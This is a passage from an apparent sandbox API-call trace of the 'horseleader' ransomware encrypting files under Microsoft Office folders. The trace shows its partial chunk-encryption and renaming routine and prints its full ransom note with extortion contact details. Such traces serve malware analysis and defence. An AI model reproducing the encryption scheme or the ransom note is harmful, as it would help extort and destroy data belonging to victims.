Files\\Microsoft Shared\\OFFICE14\\Cultures\\..") returned 71 [0244.007] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.007] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.007] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x7cbc7d00, ftCreationTime.dwHighDateTime=0x1cbe3e3, ftLastAccessTime.dwLowDateTime=0xcef24e20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7cbc7d00, ftLastWriteTime.dwHighDateTime=0x1cbe3e3, nFileSizeHigh=0x0, nFileSizeLow=0x419360, dwReserved0=0x995d73de, dwReserved1=0x3d9633d3, cFileName="OFFICE.ODF", cAlternateFileName="")) returned 1 [0244.007] lstrcmpiW (lpString1="OFFICE.ODF", lpString2="Windows") returned -1 [0244.007] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 79 [0244.007] StrStrIW (lpFirst="OFFICE.ODF", lpSrch=".horseleader") returned 0x0 [0244.007] lstrcmpW (lpString1="OFFICE.ODF", lpString2="#Decrypt#.txt") returned 1 [0244.007] lstrcmpW (lpString1="OFFICE.ODF", lpString2="_uninstalling_.png") returned 1 [0244.007] lstrlenW (lpString=".testttjffg") returned 11 [0244.007] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpSrch=".testttjffg") returned 0x0 [0244.007] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.007] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.008] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0244.008] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x7cbc7d00, ftCreationTime.dwHighDateTime=0x1cbe3e3, ftLastAccessTime.dwLowDateTime=0xcef24e20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7cbc7d00, ftLastWriteTime.dwHighDateTime=0x1cbe3e3, nFileSizeHigh=0x0, nFileSizeLow=0x419360, dwReserved0=0x995d73de, dwReserved1=0x3d9633d3, cFileName="OFFICE.ODF", cAlternateFileName="")) returned 0 [0244.008] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0244.008] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\#Decrypt#.txt") returned 82 [0244.009] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.009] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.009] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0244.011] lstrlenA (lpString="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") returned 1368 [0244.011] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0244.011] CloseHandle (hObject=0x158) returned 1 [0244.011] GetProcessHeap () returned 0x780000 [0244.011] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.011] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x520efa00, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xd83064e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x520efa00, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0x7eb48, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EXPSRV.DLL", cAlternateFileName="")) returned 1 [0244.011] lstrcmpiW (lpString1="EXPSRV.DLL", lpString2="Windows") returned -1 [0244.011] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 70 [0244.012] StrStrIW (lpFirst="EXPSRV.DLL", lpSrch=".horseleader") returned 0x0 [0244.012] lstrcmpW (lpString1="EXPSRV.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.012] lstrcmpW (lpString1="EXPSRV.DLL", lpString2="_uninstalling_.png") returned 1 [0244.012] lstrlenW (lpString=".testttjffg") returned 11 [0244.012] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE14\\EXPSRV.DLL", lpSrch=".testttjffg") returned 0x0 [0244.012] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.012] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.012] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.013] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 70 [0244.013] StrStrW (lpFirst="EXPSRV.DLL", lpSrch=".txt") returned 0x0 [0244.013] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=518984) returned 1 [0244.013] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.013] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.017] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.017] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.019] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3cda4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 
[0244.019] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.024] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.024] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.039] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x79b48, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.040] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.041] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.041] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.042] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.042] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.042] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.042] CloseHandle (hObject=0x158) returned 1 [0244.042] GetProcessHeap () returned 0x780000 [0244.043] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.043] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL.horseleader") returned 82 [0244.043] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\expsrv.dll.horseleader")) returned 1 [0244.044] GetProcessHeap () returned 0x780000 [0244.044] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.044] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ebd7300, ftCreationTime.dwHighDateTime=0x1cba5c3, ftLastAccessTime.dwLowDateTime=0xcef710e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3ebd7300, ftLastWriteTime.dwHighDateTime=0x1cba5c3, nFileSizeHigh=0x0, nFileSizeLow=0x21d78, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EXP_PDF.DLL", cAlternateFileName="")) returned 1 [0244.044] lstrcmpiW (lpString1="EXP_PDF.DLL", lpString2="Windows") returned -1 [0244.044] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 71 [0244.044] StrStrIW (lpFirst="EXP_PDF.DLL", lpSrch=".horseleader") returned 0x0 [0244.044] lstrcmpW (lpString1="EXP_PDF.DLL", lpString2="#Decrypt#.txt") returned 1 
[0244.044] lstrcmpW (lpString1="EXP_PDF.DLL", lpString2="_uninstalling_.png") returned 1 [0244.044] lstrlenW (lpString=".testttjffg") returned 11 [0244.044] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL", lpSrch=".testttjffg") returned 0x0 [0244.044] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.044] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.044] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.046] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 71 [0244.046] StrStrW (lpFirst="EXP_PDF.DLL", lpSrch=".txt") returned 0x0 [0244.046] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=138616) returned 1 [0244.047] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.047] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.051] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.051] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.051] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xe6bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.051] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.052] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.052] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.052] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1cd78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.052] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.053] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.053] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.054] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.054] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, 
lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.054] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.054] CloseHandle (hObject=0x158) returned 1 [0244.055] GetProcessHeap () returned 0x780000 [0244.055] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.055] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL.horseleader") returned 83 [0244.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_pdf.dll.horseleader")) returned 1 [0244.056] GetProcessHeap () returned 0x780000 [0244.056] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.056] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5bf6900, ftCreationTime.dwHighDateTime=0x1cba06e, ftLastAccessTime.dwLowDateTime=0xcf5b0aa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xf5bf6900, ftLastWriteTime.dwHighDateTime=0x1cba06e, nFileSizeHigh=0x0, nFileSizeLow=0x11578, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EXP_XPS.DLL", cAlternateFileName="")) returned 1 [0244.056] lstrcmpiW (lpString1="EXP_XPS.DLL", lpString2="Windows") returned -1 [0244.056] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL") returned 71 [0244.056] StrStrIW (lpFirst="EXP_XPS.DLL", lpSrch=".horseleader") returned 0x0 [0244.057] lstrcmpW (lpString1="EXP_XPS.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.057] lstrcmpW (lpString1="EXP_XPS.DLL", lpString2="_uninstalling_.png") returned 1 [0244.057] lstrlenW (lpString=".testttjffg") returned 11 [0244.057] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL", lpSrch=".testttjffg") returned 0x0 [0244.057] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.057] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.057] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.059] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL") returned 71 [0244.059] StrStrW (lpFirst="EXP_XPS.DLL", lpSrch=".txt") returned 0x0 [0244.059] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=71032) returned 1 [0244.059] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.060] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.063] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.064] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.064] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x62bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.064] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.065] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.065] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.065] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xc578, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.065] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.066] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.066] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.066] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.066] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.066] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.067] CloseHandle (hObject=0x158) returned 1 [0244.067] GetProcessHeap () returned 0x780000 [0244.067] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.067] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL.horseleader") returned 83 [0244.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll.horseleader")) returned 1 [0244.069] GetProcessHeap () returned 0x780000 [0244.069] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.069] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd66e7600, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xe572de20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd66e7600, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x26560, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, 
